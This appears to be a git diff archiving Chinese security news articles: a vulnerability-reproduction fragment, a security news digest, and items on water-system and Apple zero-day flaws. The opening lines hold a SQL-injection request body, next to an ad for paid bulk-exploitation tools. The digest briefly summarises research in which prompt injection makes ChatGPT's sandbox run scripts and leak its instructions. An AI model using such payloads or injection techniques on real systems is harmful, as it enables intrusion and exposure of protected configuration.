application/x-www-form-urlencoded +Content-Length: 31 + +userID=admin&fondsid=1&comid=1' +``` +# 漏洞复现 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/EqMwaEZz0ynRuSmicWtBVoFuSRYlbR3lCARWVzfSBPUIFGHtKOhDRC19hbKsgMj1yGW6gbz3fPHoH8rnaKy4Y6w/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/EqMwaEZz0ynRuSmicWtBVoFuSRYlbR3lCrDcazuylNEEMcdRKDamAwRianDibohL9F5xSdVsno4kvxBVcibRHHxApQ/640?wx_fmt=png&from=appmsg "") +# nuclei运行结果 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/EqMwaEZz0ynRuSmicWtBVoFuSRYlbR3lCianNA9zUv2b46UDJ24PqB4Mys9kS5Wfy3DACXhKWLdAia45GXTEfsPibg/640?wx_fmt=png&from=appmsg "") +# nuclei-poc已上传到星球 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/EqMwaEZz0ynRuSmicWtBVoFuSRYlbR3lCicIsiaTBkhrAiaHicxw1X30Jo6gA52g027uY9esu4LA6tPWxAzCS7WP17w/640?wx_fmt=png&from=appmsg "") + +高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。分享行业内最新动态,解答交流各类技术问题。 +涉及方向包括Web渗透、免杀绕过、红蓝攻防、代码审计、应急响应、安全培训、CTF、小白入门、职业规划和疑难解答。**CatalyzeSec** +,安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。 +我们是一个快速成长的team,团队的发展方向与每一位星友的学习方向密切相关,加入我们,一起成为更好的自己! +PS:随着星球内知识的积累,人员的增加, +星球价格也会随之增加,前一百位加入我们的师傅可享受99元朋友价! + +**微信群专属推送机器人** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/EqMwaEZz0ynRuSmicWtBVoFuSRYlbR3lC184VVGYfj8SBk3n2daV6CYGY5Zic6r2IkMd0IlFoudkpLEXY6kMdaqg/640?wx_fmt=png&from=appmsg "") +# + diff --git a/doc/美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览.md b/doc/美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览.md new file mode 100644 index 00000000..0443f8a8 --- /dev/null +++ b/doc/美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览.md @@ -0,0 +1,262 @@ +# 美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览 + 安全牛 2024-11-20 04:16 + +点击蓝字·关注我们  +/  +aqniu + +![](https://mmbiz.qpic.cn/mmbiz_png/kuIKKC9tNkBjwIRcuxcIx3fvDBydiaqkxw4o55dLPMJBKVsRbYl7ULkJDmFtatY9fWSIcZttiaeQm76cm0TXSBCA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +**新闻速览** + + + +•2024年世界互联网大会“互联网之光”博览会在浙江乌镇开幕 + +•《工业和信息化领域数据安全合规指引》联合发布 + +•美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露 + +•ClickFix攻击手法全球蔓延,虚假错误提示暗藏玄机 + +•黑客利用Facebook平台投放假冒Bitwarden广告传播恶意程序 + +•ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 + +•WordPress核心安全插件曝认证漏洞,或威胁超400万网站安全性 + +•Microsoft 365管理门户或遭滥用,可帮助勒索诈骗邮件逃避安全检测 + +•升级网络安全培训体系,CISA新一代学习管理平台启用 + +•强化Gmail隐私保护,Google推出Shielded Email新功能 + +  +  + + +**特别关注** + + + +**2024年世界互联网大会“互联网之光”博览会在浙江乌镇开幕** + + +11月19日,由世界互联网大会和浙江省人民政府共同主办的2024年世界互联网大会“互联网之光”博览会在浙江乌镇开幕。国家互联网信息办公室副主任王崧、世界互联网大会秘书长任贤良等出席开幕式。浙江省人民政府副省长柯吉欣出席开幕式并致辞。 + + +作为世界互联网大会乌镇峰会的重要活动,“互联网之光”博览会自2014年以来,紧紧围绕“携手构建网络空间命运共同体”的理念主张,走过了风雨追光、创新发展的十年,旨在成为互联网领域引领前沿技术趋势、展示行业最新成果、促进全球产业合作的重要平台。 + + +2024年是“互联网之光”博览会第二个十年的新起点。围绕本届乌镇峰会“拥抱以人为本、智能向善的数字未来——携手构建网络空间命运共同体”主题,博览会以人工智能为展示重点,持续深化全球数字合作,秉持共生共赢的精神,进一步拓展“国际朋友圈”,引领网络空间命运共同体进入新的发展阶段。 + + +本届博览会设置了五大活动板块,包括展览展示、新产品新技术发布、产业人才引智、产业合作对接、“新光”系列推介,通过“线下实景+线上云展”的方式,全面展示全球互联网的最新发展成果和人工智能领域的新技术、产品,吸引了来自53个国家和地区的665家中外企业与机构参展。 + + +原文链接: + +https://mp.weixin.qq.com/s/KzbP47BWloCAYdTKG_78QA + +  + +**《工业和信息化领域数据安全合规指引》联合发布** + + +为贯彻落实《数据安全法》《网络数据安全管理条例》《工业和信息化领域数据安全管理办法(试行)》等法律政策要求,引导工业和信息化领域数据处理者规范开展数据处理活动,中国钢铁工业协会、中国有色金属工业协会、中国石油和化学工业联合会、中国建筑材料联合会、中国机械工业联合会、中国汽车工业协会、中国纺织工业联合会、中国轻工业联合会、中国电子信息行业联合会、中国计算机行业协会、中国通信企业协会、中国互联网协会、中国通信标准化协会、中国中小企业国际合作协会、中国通信学会、工业和信息化部商用密码应用产业促进联盟、工业信息安全产业发展联盟等单位组织编制了《工业和信息化领域数据安全合规指引》(简称《合规指引》)。各相关单位、企业在履行数据安全保护义务时可以参考使用,共同维护数据安全、促进行业健康发展。 + + +完整版《合规指引》可访问原文链接获取。 + + +原文链接: + +https://mp.weixin.qq.com/s/rOhvWgp_UekqTpMll7rYvQ + +  + + +**网络攻击** + + + +**美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露** + + +美国国会图书馆日前披露其信息技术系统遭到疑似外国黑客组织入侵,攻击者获取了国会办公室与图书馆工作人员之间的电子邮件通信内容。据NBC News报道,美国国会图书馆已就这起"网络安全事件"通知了国会相关办公室。受影响的电子邮件通信内容涉及2024年1月至9月期间国会办公室与图书馆工作人员(包括国会研究服务处)之间的往来信息。 + +  + +作为美国实际上的国家图书馆,国会图书馆不仅为美国国会两院提供图书馆和研究服务,还通过美国版权局负责管理版权法的实施。在发现安全漏洞后,图书馆方面已第一时间通知执法部门,目前相关调查仍在进行中。 + +  + +国会图书馆在通报中表示:"图书馆已经修复了被攻击者利用的安全漏洞,并采取了相应措施防止类似事件再次发生。"同时确认美国众议院和参议院的电子邮件网络系统以及美国版权局的系统均未受到此次事件影响。而对于攻击者的身份以及攻击发生的具体时间点,调查人员仍在进一步核实中。 + +  + +原文链接: + +https://securityaffairs.com/171138/data-breach/library-of-congress-email-communications-hacked.html + +  + +**ClickFix攻击手法全球蔓延,虚假错误提示暗藏玄机** + + +近期,网络安全公司Proofpoint发布分析报告指出,黑客组织正在加大对"ClickFix"社会工程学攻击的利用。这种战术在恶意软件部署方面显示出极高的效率。自2024年3月以来,多个威胁组织已发起了数次利用该战术的攻击活动。 + + +ClickFix是一种独特的社会工程学技术,攻击者通过对话框显示虚假错误信息,诱导用户在自己的计算机上复制、粘贴并运行恶意代码。这种方式由用户自己执行感染操作,能够有效绕过安全保护机制。攻击者利用了用户倾向于自行解决问题而不是通知IT团队的心理,通过伪装成Microsoft Word和Google Chrome等常用企业软件发起攻击。 + +  + +技术分析显示,对话框可能来自被入侵的网站、文档、HTML附件或恶意URL。用户按照所谓的"修复"指令操作时,实际上会触发两种情况:要么自动将恶意脚本复制到PowerShell终端或Windows对话框中执行,要么手动打开PowerShell并粘贴提供的命令。通过这种方式,AsyncRAT、Danabot、DarkGate、Lumma Stealer和NetSupport等多种恶意软件都能成功部署。 + +  + +值得注意的是,攻击者近期频繁使用伪造的CAPTCHA验证码主题技术,通过"验证您是人类"的检查进行欺骗。这种活动大多基于一个名为"reCAPTCHA Phish"的开源工具包,该工具包自2024年9月起在GitHub上以"教育目的"提供。在一次影响全球至少300个组织的攻击中,威胁者利用GitHub通知发送恶意软件,通过伪装成GitHub安全警告的方式诱导用户执行PowerShell命令。 + + +原文链接: + +https://www.infosecurity-magazine.com/news/clickfix-cyber-malware-rise/ + +  + +**黑客利用Facebook平台投放假冒Bitwarden广告传播恶意程序** + + +近日,网络安全公司Bitdefender披露了一起针对Facebook商业账户的恶意广告攻击活动。攻击者通过Meta广告平台投放虚假广告,伪装成知名密码管理工具Bitwarden的安全更新,诱导用户安装恶意Chrome浏览器扩展程序。该攻击活动于2024年11月3日被发现,虽然目前已被关停,但安全专家警告类似威胁可能会再次出现。 + + +据研究人员介绍,攻击者精心设计了伪装成Bitwarden官方的Facebook广告,警告用户密码可能已被泄露,并催促用户立即进行所谓的"安全更新"。这些广告巧妙使用了Bitwarden的品牌元素和专业用语,让用户对其真实性深信不疑。 + + +技术分析显示,攻击的核心是background.js脚本,它在安装后立即激活并执行多项恶意操作:通过Google Script URL充当命令控制服务器进行数据窃取;搜索并收集Facebook Cookie,特别是包含用户Facebook ID的c_user cookie;获取用户IP地址和地理位置信息;利用Graph API提取Facebook个人和商业信息。 + + +原文链接: + +https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/ + +  + + +**漏洞预警** + + + +**ChatGPT沙箱环境存在多个严重安全隐患,仅有20%漏洞被修复** + + +Mozilla 0Din安全研究团队近日披露了OpenAI ChatGPT沙箱环境中的多个安全漏洞,这些漏洞允许攻击者上传并执行Python脚本,甚至能够获取语言模型的内部配置信息。目前OpenAI仅修复了上述五个漏洞中的一个。 + + +这一发现源于Mozilla 0Din的GenAI漏洞赏金项目经理Marco Figueroa在使用ChatGPT进行Python项目开发时遇到的一个异常错误。随后的深入调查显示,ChatGPT的沙箱环境基于Debian系统搭建,其访问权限远超预期。技术细节显示,攻击者可以通过提示注入(prompt injection)在ChatGPT环境中执行Python脚本,实现文件的列举、修改和迁移。更为严重的是,研究人员还发现可以提取模型的核心指令和知识库,这种访问级别极具危险性,不仅可能导致模型配置信息泄露,还可能被用于传播恶意脚本或未经授权的数据访问。 + + +对于这些发现,OpenAI的回应令人意外。该公司声称沙箱环境的设计本意就是提供一个受控环境,允许用户执行代码而不影响整体系统,并将大多数交互视为预期功能而非安全问题。然而,研究人员认为,当前沙箱环境所提供的访问权限已经超出了合理范围。 + + +原文链接: + +https://hackread.com/mozilla-0din-chatgpt-sandbox-flaws-python-execution/ + +  + +**WordPress核心安全插件曝认证漏洞,或威胁超400万网站安全性** + +  + +WordPress热门安全插件Really Simple Security(原Really Simple SSL)被发现存在严重的身份认证绕过漏洞,该漏洞可能使攻击者获得网站的完整管理权限。这一漏洞影响了全球超过400万个WordPress网站。 + + +Wordfence安全研究员István Márton警告说:"这个漏洞可以被编写成脚本,意味着攻击者可以对WordPress网站发起大规模自动化攻击。"技术分析显示,此漏洞存在于9.0.0至9.1.1.1版本中,源于名为"check_login_and_get_user"函数中的用户检查错误处理不当。当启用双因素认证时,未经身份验证的攻击者可以通过简单的请求,以任意用户身份(包括管理员)登录系统。 + + +漏洞于本月6日被负责任地披露给开发团队,并在一周后的9.1.2版本中得到修复。考虑到潜在的滥用风险,插件维护者与WordPress合作,在公开披露之前强制更新了所有运行该插件的网站。 + + +原文链接: + +https://thehackernews.com/2024/11/urgent-critical-wordpress-plugin.html + +  + +**Microsoft 365管理门户或遭滥用,可帮助勒索诈骗邮件逃避安全检测** + + +网络安全专家Lawrence Abrams日前披露,近期发现不法分子正在滥用Microsoft 365管理门户的消息中心功能发送勒索欺诈邮件。这些邮件由微软官方邮箱"o365mc@microsoft.com"发出,因此能够绕过垃圾邮件过滤器,直接进入收件箱。 + + +专家表示,这类勒索欺诈邮件是一种诈骗手段,诈骗者声称已经入侵受害者的电脑或移动设备,窃取了其私密照片或视频,并威胁索要500至5000美元的赎金,否则将与受害者的亲友分享这些所谓的隐私照片。虽然这种诈骗手法看似拙劣,但自2018年首次出现以来,每周仍能为诈骗者带来超过5万美元的非法收入。 + + +技术分析显示,攻击者通过Microsoft 365管理门户的"消息中心"功能实施诈骗。该功能原本用于分享微软服务通知和新功能介绍等信息。攻击者利用其中的"分享"功能,在"个人消息"栏中插入勒索内容。虽然该字段正常限制为1000字符,但攻击者通过修改浏览器开发者工具中的textarea标签最大长度限制,成功突破了字符限制。由于Microsoft未在服务器端进行字符长度检查,完整的勒索信息得以随通知一起发送。 + + +微软公司发言人表示:"我们十分重视安全和隐私问题。目前正在调查这些报告,并将采取行动保护用户。"但截至目前,Microsoft尚未在服务器端增加字符限制检查。 + + +原文链接: + +https://www.bleepingcomputer.com/news/security/microsoft-365-admin-portal-abused-to-send-sextortion-emails/ + +   + + +**产业动态** + + + +**升级网络安全培训体系, CISA新一代学习管理平台启用** + + +美国网络安全和基础设施安全局(CISA)于近日宣布推出新一代学习管理系统"CISA Learning"。该平台将取代原有的联邦虚拟培训环境(FedVTE),致力于为机构员工和关键利益相关者提供现代化的培训和教育服务。 + + +CISA首席人事官Elizabeth Kolmstetter博士表示:"CISA Learning将提供一个易于导航的现代化学习管理系统,在现有工具和资源的基础上,继续为政府雇员、承包商和美国退伍军人提供免费的网络安全培训。这体现了CISA致力于培养和发展国家网络安全人才队伍的承诺,以更好地保护美国人民每天依赖的关键基础设施。" + + +作为CISA企业学习环境现代化的关键组成部分,CISA Learning将为联邦、州、地方、部落和领地各级政府的合作伙伴以及退伍军人提供免费培训资源。新平台提供课堂培训、虚拟讲师指导培训和自定进度在线模块等多种可扩展的培训方案,使用户能够灵活地在办公室、家中或野外参与课程学习。 + + +原文链接: + +https://www.cisa.gov/news-events/news/cisa-launches-new-learning-platform-enhance-training-and-education-us-veterans-and-other + +  + +**强化Gmail隐私保护,Google推出Shielded Email新功能** + +  + +Google近日宣布推出突破性新功能"Shielded Email",旨在革新电子邮件隐私保护并对抗垃圾邮件。该创新工具允许Gmail用户创建临时邮箱别名,在注册在线服务或填写表单时有效隐藏主邮箱地址。 + + +据报道,Shielded Email通过生成独特的一次性电子邮件地址来实现功能。这些地址会自动将收到的邮件转发到用户的主Gmail收件箱。用户可能在Autofill(自动填充)设置菜单中找到创建Shielded Email地址的选项,便于在各类应用和网站中使用。这意味着用户可以在不暴露真实邮箱地址的情况下与网站和服务进行交互,显著降低收到垃圾邮件和不必要营销信息的风险。 + + +该功能的一大亮点是用户可以通过停用这些相关的隐私地址,轻松切断来自任何问题源的通信。这种程度的控制为用户提供了前所未有的收件箱管理能力。隐私倡导者认为,随着在线隐私问题日益突出,Shielded Email等工具变得越发重要。通过赋予用户更多个人信息控制权,不仅改善了电子邮件使用体验,还为科技行业的数字隐私保护设立了新标准。这可能标志着打击垃圾邮件和未经授权数据收集战的转折点。 + + +原文链接: + +https://cybersecuritynews.com/google-announces-shielded-email-feature/ + + + + +![](https://mmbiz.qpic.cn/mmbiz_png/kuIKKC9tNkAfZibz9TQ8KWj4voxxxNSGMnicXSRCtG4URyLibbqPegjnnibfRB0z4zIzwghbLOkV5fqGYM8vhuQdqw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +合作电话:18311333376 + +合作微信:aqniu001 + +投稿邮箱:editor@aqniu.com + +![](https://mmbiz.qpic.cn/mmbiz_gif/kuIKKC9tNkAfZibz9TQ8KWj4voxxxNSGMAGiauAWicdDiaVl8fUJYtSgichibSzDUJvsic9HUfC38aPH9ia3sopypYW8ew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "") + + + diff --git a/doc/美国饮用水系统存在300多个漏洞,影响1.1亿人.md b/doc/美国饮用水系统存在300多个漏洞,影响1.1亿人.md index 25370b81..67bd6633 100644 --- a/doc/美国饮用水系统存在300多个漏洞,影响1.1亿人.md +++ b/doc/美国饮用水系统存在300多个漏洞,影响1.1亿人.md @@ -1,78 +1,45 @@ # 美国饮用水系统存在300多个漏洞,影响1.1亿人 -FreeBuf 商密君 2024-11-19 14:31 + 黑白之道 2024-11-20 06:58 + +![](https://mmbiz.qpic.cn/mmbiz_gif/3xxicXNlTXLicwgPqvK8QgwnCr09iaSllrsXJLMkThiaHibEntZKkJiaicEd4ibWQxyn3gtAWbyGqtHVb0qqsHFC9jW3oQ/640?wx_fmt=gif "") > 美国环境保护署(EPA)标记了300多个饮用水系统的安全漏洞,这些系统为大约1.1亿人提供服务。 - -近日,美国环境保护署(EPA)监察长办公室(OIG)发布了一份研究报告,在对美国1062个饮用水系统进行了安全性缺陷评估活动之后,结果显示,超过300个饮用水系统存在系统漏洞,存在可能导致功能丧失、无法服务和用户信息泄露的风险。不安全的饮用水系统为1.1亿美国人提供服务。 - - -![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39uD8TzUAG6icPT99CvicxqoBse5fFY24qpe6vJID3aqMLWbN5d0nubADskMPU9b5xzxIakSap6BYOw/640?wx_fmt=jpeg&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "") +近日,美国环境保护署(EPA)监察长办公室(OIG)发布了一份研究报告,在对美国1062个饮用水系统进行了安全性缺陷评估活动之后,结果显示,超过300个饮用水系统存在系统漏洞,存在可能导致功能丧失、无法服务和用户信息泄露的风险。不安全的饮用水系统为1.1亿美国人提供服务。![](https://mmbiz.qpic.cn/mmbiz_jpg/3xxicXNlTXLibtrbvia25lnpqNTEqIhWJ6Z7LxQXwFvSTRgddQNf9PENbLhM9I7JZiamS6ERUW6PBicsCUfE129nEYQ/640?wx_fmt=jpeg&from=appmsg "") 安全性缺陷评估涵盖了五个网络安全类别,即电子邮件安全、IT卫生、漏洞、对抗性威胁和恶意活动,并根据潜在影响对识别的漏洞从低到高进行评分。 - 数据显示,97个系统存在关键或高风险漏洞,可能导致服务瘫痪或数据泄露,另有211个系统存在可被外部访问的开放端口,尽管风险较低,但若不及时修复,仍有可能被利用。 - OIG进一步表示,“如果网络攻击者利用我们在被动评估中识别的网络安全漏洞,他们可能会中断服务或对饮用水基础设施造成无法弥补的物理损害。” - EPA还会为每个被调查对象绘制系统的数字足迹,涵盖用于收集、泵送、处理、储存和分配饮用水的基础设施,分析超过75000个IP和14400个域名。 - 该报告还总结了EPA在网络安全方面的不足。EPA缺乏一个集中式的事件报告系统,目前依赖美国网络安全和基础设施安全局(CISA)进行此类报告,这明显限制了威胁发生时的及时沟通与协调响应能力。此外还有饮用水系统的管理人员缺乏足够的网络安全培训,导致系统容易被黑客攻击;许多供水系统陈旧过时,缺乏维护,进一步增加了网络安全风险。 - 针对上述问题,EPA计划利用饮用水州循环基金和大中型饮用水系统基础设施恢复力与可持续性计划,为公共供水系统提供培训、技术援助和财务支持,以加强其网络安全防护能力。 - 事实上,美国饮用水系统一直存在严重安全风险。2021年2月,黑客通过远程控制软件TeamViewer入侵佛罗里达州奥兹玛市自来水厂的电脑系统,试图将氢氧化钠的含量从百万分之100大幅提高到百万分之111000,这直接达到了“水质危险”的程度。 - 由于员工及时发现并干预,没有对公众造成实际伤害。但FBI和特勤局介入调查后,议员马可·罗伯(Marco Rubio)要求FBI全力协助,将此案件视为国家安全问题。 +再今年5月,EPA也曾警告说,超过70%的水系统不符合《安全饮用水法》,强调了严重性高的问题,例如使用默认密码和容易受到黑客攻击的认证系统,这些都大大降低了攻击者入侵的门槛。 -在今年5月,EPA也曾警告说,超过70%的水系统不符合《安全饮用水法》,强调了严重性高的问题,例如使用默认密码和容易受到黑客攻击的认证系统,这些都大大降低了攻击者入侵的门槛。 +为此,EPA要求在各州进行公共供水系统的卫生检查时,强制纳入网络安全评估。供水系统运营商也需要制定适当的事件响应计划,以便在检测和分析网络事件时能够快速、准确地报告事件并收集数据进行分析。对此,美国联邦机构发布了指导意见,帮助供水和废水处理系统运营商更好地应对网络攻击。EPA也与CISA、FBI联合发布指南:EPA与美国网络安全和基础设施安全局(CISA)及美国联邦调查局(FBI)联合发布了一项网络安全实践指南,旨在帮助城市供水和废水处理领域的企业组织提高网络安全弹性和事件响应能力。 +> 参考来源:https://www.securityweek.com/300-drinking-water-systems-in-us-exposed-to-disruptive-damaging-hacker-attacks/ -为此,EPA要求在各州进行公共供水系统的卫生检查时,强制纳入网络安全评估。供水系统运营商也需要制定适当的事件响应计划,以便在检测和分析网络事件时能够快速、准确地报告事件并收集数据进行分析。对此,美国联邦机构发布了指导意见,帮助供水和废水处理系统运营商更好地应对网络攻击。 +> **文章来源:freebuf** -EPA也与美国网络安全和基础设施安全局(CISA)及美国联邦调查局(FBI)联合发布了一项网络安全实践指南,旨在帮助城市供水和废水处理领域的企业组织提高网络安全弹性和事件响应能力。 + +黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! + +如侵权请私聊我们删文 -编辑:陈十九 - -审核:商密君 - -**征文启事** - -大家好,为了更好地促进同业间学术交流,商密君现开启征文活动,只要你对商用密码、网络安全、数据加密等有自己的独到见解和想法,都可以积极向商密君投稿,商密君一定将您的声音传递给更多的人。 +**END** -![](https://mmbiz.qpic.cn/mmbiz_jpg/1HyKzSU2XXNcXmbiaiaCljdXpwzOEQ9QTBXMibM6rZTOnbTSwTmCXncQLria2vuLGxn8QPtznzBc0as8vBxWIjrWxQ/640?wx_fmt=jpeg "") - -来源:FreeBuf - -注:内容均来源于互联网,版权归作者所有,如有侵权,请联系告知,我们将尽快处理。 - -![](https://mmbiz.qpic.cn/mmbiz_jpg/1HyKzSU2XXOdeQx0thlyozF2swQTEN9iaaBNDG0jTKfAgqgdesve8x5IEWNvYxjF6sAWjO1TPCZVsWd0oiaDn3uw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "") - - -![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMyyClGk1cttkSBbJicAn5drpXEbFIeChG9IkrslYEylRF4Z6KNaxNafDwr5ibcYaZXdnveQCNIr5kw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "") - -![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaMcJkA69QYZ9T4jmc3fdN6EA7Qq9A8E3RWcTKhxVEU1QjqOgrJMu2Qg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "") - -点分享 - -![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaiaRXdw4BFsc7MxzkVZaKGgtjWA5GKtUfm3hlgzsBtjJ0mnh9QibeFOGQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "") - -点点赞 - -![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaeiaNlRO9954g4VS87icD7KQdxzokTGDIjmCJA563IwfStoFzPUaliauXg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "") - -点在看 - diff --git a/doc/苹果确认针对 macOS 系统的零日漏洞攻击.md b/doc/苹果确认针对 macOS 系统的零日漏洞攻击.md new file mode 100644 index 00000000..f6a98db9 --- /dev/null +++ b/doc/苹果确认针对 macOS 系统的零日漏洞攻击.md @@ -0,0 +1,38 @@ +# 苹果确认针对 macOS 系统的零日漏洞攻击 +原创 hackerson 黑客联盟l 2024-11-20 11:32 + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWhqjlIpdACpYtdVvKD3OPyBmYA5brJN4sK34dYRQcSL3uKNsGNoib9fEN3CEGeChjIvOx8qClscs5w/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/dhzGXdxNSYu4q1XpgcGjUVvVsGI1Z88FWYPKBuFFpMm7riaUsK6S3FkFhTY3P2Fa8HjszTMVcibYm5Yj2liaAztYA/640?wx_fmt=jpeg&from=appmsg "") + + +苹果已紧急推出重大的 macOS 和 iOS 安全更新,以修复两个已被利用的漏洞。 + + +苹果在周二发布的一份公告中证实,这些漏洞由谷歌的威胁分析小组(TAG)发现,正在基于英特尔处理器的 macOS 系统上被积极利用。 + + +按照惯例,苹果的安全响应团队并未提供所报告攻击的任何细节或失陷指标(IOC)来帮助防御者查找感染迹象。 + + +**已修复漏洞的详细情况:** + + +CVE-2024-44308——JavaScriptCore—— 处理恶意构造的网页内容可能导致任意代码执行。苹果已知悉一份报告称,这个问题可能已在基于英特尔处理器的 Mac 系统上被积极利用。 + + +CVE-2024-44309——WebKit—— 处理恶意构造的网页内容可能导致跨站脚本攻击。苹果已知悉一份报告称,这个问题可能已在基于英特尔处理器的 Mac 系统上被积极利用。 + + +该公司敦促整个苹果生态系统的用户尽快安装紧急发布的 iOS 18.1.1、macOS Sequoia 15.1.1 以及旧版本的 iOS 17.7.2。 + + +本月早些时候,朝鲜的加密货币窃贼再次被发现针对 macOS 用户发起一场新的恶意软件活动,该活动利用钓鱼邮件、虚假 PDF 应用程序以及一种新颖的技术来规避苹果的安全措施。 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/dhzGXdxNSYu9NHeLQtcv3btw1zjO4LfzWI3eeGE0fkD9CaQEgDh4FHsKYk8iaVOjhRgGKfEbfRwZf64QibNxEmWg/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +关注【**黑客联盟**】带你走进神秘的黑客世界 + + + diff --git a/doc/苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞.md b/doc/苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞.md new file mode 100644 index 00000000..06709bb9 --- /dev/null +++ b/doc/苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞.md @@ -0,0 +1,61 @@ +# 苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞 +看雪学苑 看雪学苑 2024-11-20 10:06 + +> 苹果公司针对基于英特尔处理器的Mac系统发布了紧急安全更新,修复了两个被积极利用的零日漏洞。这些漏洞涉及macOS的JavaScriptCore和WebKit组件,可能允许攻击者通过恶意网页内容执行任意代码或发起跨站脚本攻击。 + + + + +苹果公司在11月19日发布了紧急安全更新,以修复两个零日漏洞,这些漏洞被用于针对基于英特尔处理器的Mac系统的攻击中。该公司在咨询报告中表示,已获悉有关该问题可能已被利用的报告。 + + +这两个漏洞分别被追踪为CVE-2024-44308和CVE-2024-44309,它们存在于macOS的JavaScriptCore和WebKit组件中。JavaScriptCore的漏洞(CVE-2024-44308)允许攻击者通过恶意制作的Web内容实现远程代码执行,而WebKit的漏洞(CVE-2024-44309)则允许跨站点脚本(XSS)攻击。 + + +苹果公司表示,这些安全漏洞已在macOS Sequoia 15.1.1中得到解决。由于iOS和iPadOS中也存在相同的组件,因此在iOS 17.7.2、iPadOS 17.7.2、iOS 18.1.1和iPadOS 18.1.1以及VisionOS 2.1.1中也修复了这些问题。 + + +这两个漏洞是由谷歌威胁分析小组的Clément Lecigne和Benoît Sevens发现的,但苹果尚未提供有关如何利用这些漏洞的更多详细信息。凭借这两个漏洞的修复,苹果公司在2024年迄今已修复了6个零日漏洞。 + + +苹果公司强烈建议所有用户立即安装最新的安全补丁,以确保设备的安全。 + + + +资讯来源:bleepingcomputer + +转载请注明出处和本文链接 + + + +﹀ + +﹀ + +﹀ + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/Uia4617poZXP96fGaMPXib13V1bJ52yHq9ycD9Zv3WhiaRb2rKV6wghrNa4VyFR2wibBVNfZt3M5IuUiauQGHvxhQrA/640?wx_fmt=jpeg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1UG7KPNHN8E9S6vNnUMRCOictT4PicNGMgHmsIkOvEno4oPVWrhwQCWNRTquZGs2ZLYic8IJTJBjxhWVoCa47V9Rw/640?wx_fmt=gif "") + +**球分享** + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1UG7KPNHN8E9S6vNnUMRCOictT4PicNGMgHmsIkOvEno4oPVWrhwQCWNRTquZGs2ZLYic8IJTJBjxhWVoCa47V9Rw/640?wx_fmt=gif "") + +**球点赞** + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1UG7KPNHN8E9S6vNnUMRCOictT4PicNGMgHmsIkOvEno4oPVWrhwQCWNRTquZGs2ZLYic8IJTJBjxhWVoCa47V9Rw/640?wx_fmt=gif "") + +**球在看** + +**** +**** + +![](https://mmbiz.qpic.cn/mmbiz_gif/1UG7KPNHN8FxuBNT7e2ZEfQZgBuH2GkFjvK4tzErD5Q56kwaEL0N099icLfx1ZvVvqzcRG3oMtIXqUz5T9HYKicA/640?wx_fmt=gif "") + +戳 +“阅读原文 +” +一起来充电吧! +